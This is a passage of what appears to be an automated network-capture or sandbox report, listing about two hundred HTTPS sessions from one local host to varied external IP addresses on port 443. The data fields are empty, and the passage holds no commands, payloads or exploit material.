                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15380192.168.2.135728679.150.177.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15381192.168.2.135874619.200.73.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15382192.168.2.1359974190.25.184.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15383192.168.2.1343308108.193.228.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15384192.168.2.1347260169.65.153.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15385192.168.2.1337310122.213.142.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15386192.168.2.1334256154.157.253.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15387192.168.2.1354318185.176.254.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15388192.168.2.1352122218.90.66.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15389192.168.2.1337538169.203.43.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15390192.168.2.1356962136.228.150.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15391192.168.2.1357682196.45.145.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15392192.168.2.1342758208.62.190.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15393192.168.2.134217089.73.248.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15394192.168.2.133942872.201.149.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15395192.168.2.1338342126.55.7.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15396192.168.2.133849868.141.216.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15397192.168.2.1350018122.35.32.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15398192.168.2.1340776174.12.126.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15399192.168.2.13581968.147.123.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15400192.168.2.134868841.87.3.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15401192.168.2.134926296.63.155.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15402192.168.2.1335596198.72.64.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15403192.168.2.1357130196.32.81.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15404192.168.2.134370642.185.215.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15405192.168.2.1344094137.204.165.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15406192.168.2.1339018136.77.194.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15407192.168.2.1344872205.19.99.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15408192.168.2.135518042.109.19.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15409192.168.2.1346334154.239.11.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15410192.168.2.133284088.72.227.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15411192.168.2.1356822181.198.249.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15412192.168.2.1336680185.183.211.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15413192.168.2.135288882.147.115.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15414192.168.2.1349964217.127.21.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15415192.168.2.135027679.6.11.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15416192.168.2.1343702165.28.94.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15417192.168.2.1340314209.229.131.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15418192.168.2.1335108182.129.85.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15419192.168.2.1347630222.116.252.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15420192.168.2.1333776192.72.179.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15421192.168.2.1334388211.1.207.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15422192.168.2.1353414219.219.205.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15423192.168.2.1351282199.238.56.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15424192.168.2.1360468217.120.58.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15425192.168.2.1342784112.147.204.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15426192.168.2.1358780164.72.116.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15427192.168.2.1339164162.73.31.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15428192.168.2.1339884129.112.150.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15429192.168.2.1360248221.164.22.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15430192.168.2.135302868.219.112.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15431192.168.2.1348506156.215.254.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15432192.168.2.134232840.197.240.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15433192.168.2.135172640.135.37.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15434192.168.2.135199862.141.244.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15435192.168.2.1333896143.58.218.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15436192.168.2.1345696118.188.207.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15437192.168.2.1347890128.196.196.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15438192.168.2.1357138145.249.16.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15439192.168.2.133586824.246.136.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15440192.168.2.1347328184.63.26.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15441192.168.2.1345342147.78.189.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15442192.168.2.1355738125.48.164.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15443192.168.2.134964890.56.117.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15444192.168.2.1332834123.251.87.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15445192.168.2.135801836.94.208.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15446192.168.2.134257417.223.129.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15447192.168.2.1351004189.247.181.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15448192.168.2.133918052.10.90.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15449192.168.2.134160677.72.190.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15450192.168.2.1353136201.137.99.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15451192.168.2.136076473.29.170.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15452192.168.2.1355242163.58.219.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15453192.168.2.1344276175.161.94.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15454192.168.2.135328667.236.42.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15455192.168.2.1345306103.228.211.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15456192.168.2.1335540124.177.82.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15457192.168.2.1341472112.0.76.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15458192.168.2.1341132210.61.213.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15459192.168.2.135865039.79.10.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15460192.168.2.134063447.24.212.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15461192.168.2.13579369.113.120.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15462192.168.2.135397623.118.85.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15463192.168.2.13469182.128.153.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15464192.168.2.133304290.179.68.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15465192.168.2.133422478.54.215.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15466192.168.2.1360166125.95.133.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15467192.168.2.1353918111.225.55.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15468192.168.2.1345546128.24.37.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15469192.168.2.1336534139.205.147.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15470192.168.2.1355228136.48.21.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15471192.168.2.135437037.131.225.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15472192.168.2.133990237.70.193.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15473192.168.2.1355352133.51.126.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15474192.168.2.1343832163.69.140.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15475192.168.2.1333216103.125.224.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15476192.168.2.133514073.229.10.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15477192.168.2.1345820118.89.90.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15478192.168.2.133277098.38.128.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15479192.168.2.134574294.55.55.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15480192.168.2.1335654142.174.141.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15481192.168.2.1360652183.185.239.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15482192.168.2.1357740150.113.5.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15483192.168.2.1357504144.112.73.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15484192.168.2.1339794119.212.13.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15485192.168.2.1360474189.107.197.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15486192.168.2.1342282130.17.54.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15487192.168.2.133625053.188.191.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15488192.168.2.13358341.25.178.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15489192.168.2.13560268.225.239.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15490192.168.2.1347580184.245.206.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15491192.168.2.1343992105.26.36.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15492192.168.2.1344120137.229.10.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15493192.168.2.134095213.49.159.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15494192.168.2.134793648.212.185.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15495192.168.2.1358564163.30.159.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15496192.168.2.133659017.16.174.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15497192.168.2.13415102.103.161.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15498192.168.2.133451257.148.160.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15499192.168.2.134988893.96.80.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15500192.168.2.134501631.109.139.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15501192.168.2.133987840.37.52.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15502192.168.2.133507863.7.242.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15503192.168.2.1339920161.185.54.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15504192.168.2.134555875.167.121.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15505192.168.2.135677088.56.48.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15506192.168.2.1358704217.242.221.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15507192.168.2.135936878.146.53.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15508192.168.2.1337622156.22.158.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15509192.168.2.1356818107.80.61.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15510192.168.2.1346382186.227.233.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15511192.168.2.135666651.93.226.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15512192.168.2.134432675.69.46.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15513192.168.2.1356206195.224.54.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15514192.168.2.134319654.108.183.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15515192.168.2.133519637.158.116.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15516192.168.2.135980678.227.251.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15517192.168.2.1338690125.124.209.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15518192.168.2.1351780151.135.175.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15519192.168.2.1337718216.157.44.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15520192.168.2.135055634.151.76.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15521192.168.2.1354018203.185.76.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15522192.168.2.1347176130.102.125.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15523192.168.2.135118636.136.228.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15524192.168.2.1349516129.33.81.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15525192.168.2.135630498.130.95.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15526192.168.2.134700063.232.228.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15527192.168.2.1357990208.166.93.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15528192.168.2.134307658.114.169.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15529192.168.2.1345954136.203.141.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15530192.168.2.1337276150.188.87.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15531192.168.2.1353460187.44.56.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15532192.168.2.1358466102.77.74.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15533192.168.2.1350270211.101.219.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15534192.168.2.1349732117.56.97.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15535192.168.2.1353198166.3.61.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15536192.168.2.1336862126.173.135.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15537192.168.2.133832254.19.246.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15538192.168.2.1344806206.66.163.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15539192.168.2.134375642.202.239.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15540192.168.2.1345348203.146.173.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15541192.168.2.13344325.24.216.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15542192.168.2.1351362163.120.247.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15543192.168.2.1349532165.53.148.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15544192.168.2.1352414124.201.231.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15545192.168.2.134754483.170.10.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15546192.168.2.135960654.126.169.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15547192.168.2.1333170101.233.66.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15548192.168.2.1343594196.230.2.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15549192.168.2.1360974179.196.77.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15550192.168.2.1359454178.127.11.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15551192.168.2.1360156195.157.239.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15552192.168.2.1355192114.17.137.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15553192.168.2.133723217.129.236.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15554192.168.2.1348436186.207.51.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15555192.168.2.1342154222.119.149.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15556192.168.2.134756853.222.156.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15557192.168.2.1341392107.170.7.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15558192.168.2.1346310216.100.188.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15559192.168.2.134637218.87.51.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15560192.168.2.1357760183.157.210.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15561192.168.2.134925281.142.170.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15562192.168.2.134513843.208.234.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15563192.168.2.133794869.225.82.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15564192.168.2.133420459.98.254.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15565192.168.2.135068459.233.176.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15566192.168.2.133600876.157.181.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15567192.168.2.135224878.254.118.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15568192.168.2.1334020171.91.107.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15569192.168.2.134880849.212.85.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15570192.168.2.135469275.162.116.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15571192.168.2.1346648220.210.232.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15572192.168.2.1354656222.94.118.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15573192.168.2.136075035.141.30.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15574192.168.2.1339722118.39.149.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15575192.168.2.1333920102.70.248.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15576192.168.2.1357488119.62.138.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15577192.168.2.135157818.28.236.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15578192.168.2.1354180126.39.179.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15579192.168.2.1340248164.106.244.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15580192.168.2.1351642216.74.50.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15581192.168.2.135962867.12.11.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15582192.168.2.134100445.62.161.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15583192.168.2.1352052104.30.141.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15584192.168.2.1340400223.202.218.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15585192.168.2.1357926121.235.160.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15586192.168.2.1338526146.43.4.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15587192.168.2.1333064171.166.172.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15588192.168.2.1338350109.153.162.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15589192.168.2.136024618.23.101.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15590192.168.2.1355426188.68.215.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15591192.168.2.134036637.203.18.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
